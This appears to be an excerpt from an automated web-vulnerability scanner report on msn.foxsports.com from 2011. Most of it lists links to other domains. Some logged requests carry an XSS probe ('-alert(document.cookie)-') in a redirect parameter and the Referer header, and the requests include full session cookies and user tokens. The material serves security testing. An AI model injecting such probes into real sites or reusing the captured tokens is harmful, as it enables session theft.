
    <a href="http://www.foxsportssouthwest.com/01/05/11/The-case-for-and-against-Jason-Garrett/landing_cowboys.html?blockID=385478&amp;feedID=4679" title="Good hire?"></a>
...[SNIP]...
<div class="subhead Rumors"><a href="http://www.yardbarker.com"><img src="/component/photo/BroughtToYouByYardbarker">
...[SNIP]...
<h3><a title="Are Seahawks fans getting ripped off at the concession stand?" href="http://network.yardbarker.com/all_sports/article_external/is_the_seahawks_12th_man_getting_ripped_off/3926828">Are Seahawks fans getting ripped off at the concession stand?</a>
...[SNIP]...
<h3><a title="&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism" href="http://network.yardbarker.com/mlb/article_external/homeless_radio_voice_guy_story_shows_us_the_best_and_worst_of_journalism_in_the_age_of_the_internet/3926527">&#8216;Homeless Radio Voice Guy&#8217; story shows the best and worst of internet age journalism</a>
...[SNIP]...
<h3><a title="Can Elway return Denver to the glory days?" href="http://network.yardbarker.com/nfl/article_external/can_john_elway_return_denver_to_their_days_of_glory/3926452">Can Elway return Denver to the glory days?</a>
...[SNIP]...
<div class="foot"><a title="MORE RUMORS" class="more" href="http://www.yardbarker.com/rumors">MORE RUMORS&nbsp;&raquo;</a>
...[SNIP]...
<td class="fs-promo-card-image" width="65">
                   <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd"><img alt="Gridiron Dynasty" border="0" src="/component/photo/Gridiron_Dynasty_65x48" />
...[SNIP]...
<strong><a href="http://www.whatifsports.com/x.asp?r=678106&u=gd">Gridiron Dynasty</a>
...[SNIP]...
<div>
                           <a href="http://www.whatifsports.com/x.asp?r=678106&u=gd" target="_blank">PLAY NOW</a>
...[SNIP]...
<div class="body">
<a title="A year of turbulence in air travel" class="main-story" href="http://www.bing.com/travel/content/search?q=The+Middle+Seat%3a+A+Year+of+Turbulence+in+Air+Travel&cid=msn1174923&form=TRVCON&ocid=xnetr4-1"><img alt="A Transportation Security Administration officer pats down Elliott Erwitt as he works his way through security at San Francisco International Airport in San Francisco, c. Jeff Chiu - AP" border="0" height="90" width="90" src="http://blstb.msn.com/i/AD/F29127CDF33B4F7F0435CFFA510E7.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Elizabeth Edwards' will" href="http://specials.msn.com/A-List/Lifestyle/Nothing-for-John-Edwards.aspx?cp-documentid=27145166&ocid=xnetr4-2">Elizabeth Edwards' will</a>
...[SNIP]...
<li>
<a title="'Lost' numbers lucky in Mega Millions" href="http://www.bing.com/search?q=%22lost%22+numbers+mega+millions+lottery&form=msnhpm&ocid=xnetr4-3">'Lost' numbers lucky in Mega Millions</a>
...[SNIP]...
<li>
<a title="Video: Top 5 must-sees at CES" href="http://www.bing.com/videos/watch/video/top-5-at-ces/q9v2d33x?q=Consumer+Electronics+Show&rel=msn&from=en-us_msnhp&form=msnrll&gt1=42007&ocid=xnetr4-4">Video: Top 5 must-sees at CES</a>
...[SNIP]...
<h4 class="story-data" title="Bill Reiter">
                   
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/010611-Road-Warrior-SW-PI_20110106211141407_196_100.JPG" class="story-image" width="196" height="100" alt="LeBron James (Phot
...[SNIP]...
</a>
                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="Road warrior">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" class="story-blurb" title="Road warrior">
                           LeBron has been especially lethal away from Miami.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportsflorida.com/01/06/11/LeBron-at-his-best-on-the-road-this-seas/landing_reiter.html?blockID=386478&amp;feedID=7926" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
<h4 class="story-data" title="FOX SPORTS SOUTHWEST">
                   
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <img src="http://static.foxsports.com/content/fscom/img/2011/01/06/gasleak-pi_20110106172942297_196_100.JPG" class="story-image" width="196" height="100" alt="Drew Brees, New Orleans Saints" t
...[SNIP]...
</a>
                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="Gas leak">
                           <strong>
...[SNIP]...
</a>

                       <a href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" class="story-blurb" title="Gas leak">
                           Saints' high-octane aerial assault doesn't resemble last season's
juggernaut.

                       </a>
...[SNIP]...
<br />
                       <a class="story-link" href="http://www.foxsportssouthwest.com/01/05/11/Saints-offense-not-where-it-was-a-year-a/landing_saints.html?blockID=385785&amp;feedID=7065" title="FULL STORY">
                    FULL STORY&nbsp;&raquo;
                       </a>
...[SNIP]...
</div>


<a href="http://g.msn.com/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/shows/inside-call?vid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=b9deb230-39e9-4479-b7a4-fa4309888336&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=11488b72-869b-4def-9ea2-d302aaaf2581&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=1e97202c-76bd-4bc7-935c-5ad5ba9cae5a&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/other/page/fox-flash?vid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=8d71ff62-ef59-430a-8b81-55b13aeb12f5&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video?vid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;from=foxsports/home/home_gallery'><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=3aebb01e-8cbe-45fd-9ef9-9662874330aa&amp;w=136&amp;h=102" height="69" width="92" /></a>
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG">
   
       
                   <a href="http://foxsports.seenon.com/?v=fox-sports_nfl&amp;ecid=PRF-SM-510004&amp;PA=FOXNFLSideline_300X100"><img src="http://static.foxsports.com/content/fscom/img/2010/09/21/foxsports_300x100_NFLSidelines_20100921191918_0_0.JPG" alt="" border="0" />
...[SNIP]...
<div id="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG">
   
       
                   <a href="http://www.ticketsnow.com/NFL-Football-Tickets/NFL-Playoff-Tickets.html?partnerCode=foxnfl "><img src="http://static.foxsports.com/content/fscom/img/2011/01/07/nfl_Playoffs_300x100_B_20110107192147867_0_0.JPG" alt="" border="0" />
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.4. http://msn.foxsports.com/account/register

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/register

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /account/register?fu=http%3A%2F%2Fmsn.foxsports.com%2Fcollegefootball%2Fstory%2FStanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611%3F8dd92'-alert(document.cookie)-'c38e52b2865%3D1 HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Referer: http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
Expires: Sat, 08 Jan 2011 00:28:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:28:45 GMT
Connection: close
Content-Length: 22487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<li>
                       <a title="Jobs" href="http://www.foxcareers.com">Jobs</a>
...[SNIP]...
<li>
                       <a title="Join Our Opinion Panel" href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a title="FOX.com" href="http://www.fox.com">FOX.com</a>
...[SNIP]...
<li>
                       <a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<li>
                       <a title="News Corp" href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.msn.com/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.msn.com/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.msn.com/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...

10.5. http://msn.foxsports.com/account/transition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /account/transition

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /account/transition?fu=http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611?8dd92'-alert(document.cookie)-'c38e52b2865=1&initiatingAction=registration&egs=Br6fOGGTWiuzTHiTHk2TzuyT6zQ%3D&ts=1294446581&esefsuid=p%2Fk94ON71KoD%2FEYqOMDzIDg%3D%3D HTTP/1.1
Host: msn.foxsports.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; NetInsightSessionID=1; UnicaNIODID=desyou1VHJ2-Ww6pyII; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pExternalUser=; pLMD="2011-01-08 00:29:40"; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pENC_FNAME=Z1NVLTXWY1w=; pENC_LNAME=/wgeX1XilBI=; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8faWo21+967G5VI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAYzZ7kzf7qlWgWeR/uovPQww==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCROxuO+YKyVeX7VpqEGMPu4akUu+MvLCZD/TvFgkbWxEqngFEv2yyszi6CK3C+DMIRTuJe07xWXcKcYLhi2LDmTGASfy8pQ9OxVXdOY7vU8EZaDs39+Aki4D8BhFFDJwaqB/Vsqyg5NK2sjAH6QM2nalSQxKBe3ixzNs3FhZ3AJ0a; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF0tmdVYO39pJU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi2Bt1ptjLOaC; p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjCrs73KCEqhp; pUID=/k94ON71KoD/EYqOMDzIDg==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Vary: Accept-Encoding
P3P: CP='DSP CUR OTi IND OTRi ONL FIN'
Expires: Sat, 08 Jan 2011 00:29:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 08 Jan 2011 00:29:45 GMT
Connection: close
Content-Length: 4257


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...
</script>

   
           <script language="javascript" type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25"></script>
...[SNIP]...

10.6. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

Summary

Severity:   Information
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611?gt1=39002 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; 
pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 244579
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=3
Date: Sat, 08 Jan 2011 01:12:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>


            <script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.msn.com/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.msn.com/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
class="">


                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">

   
                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">

   
                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">

   
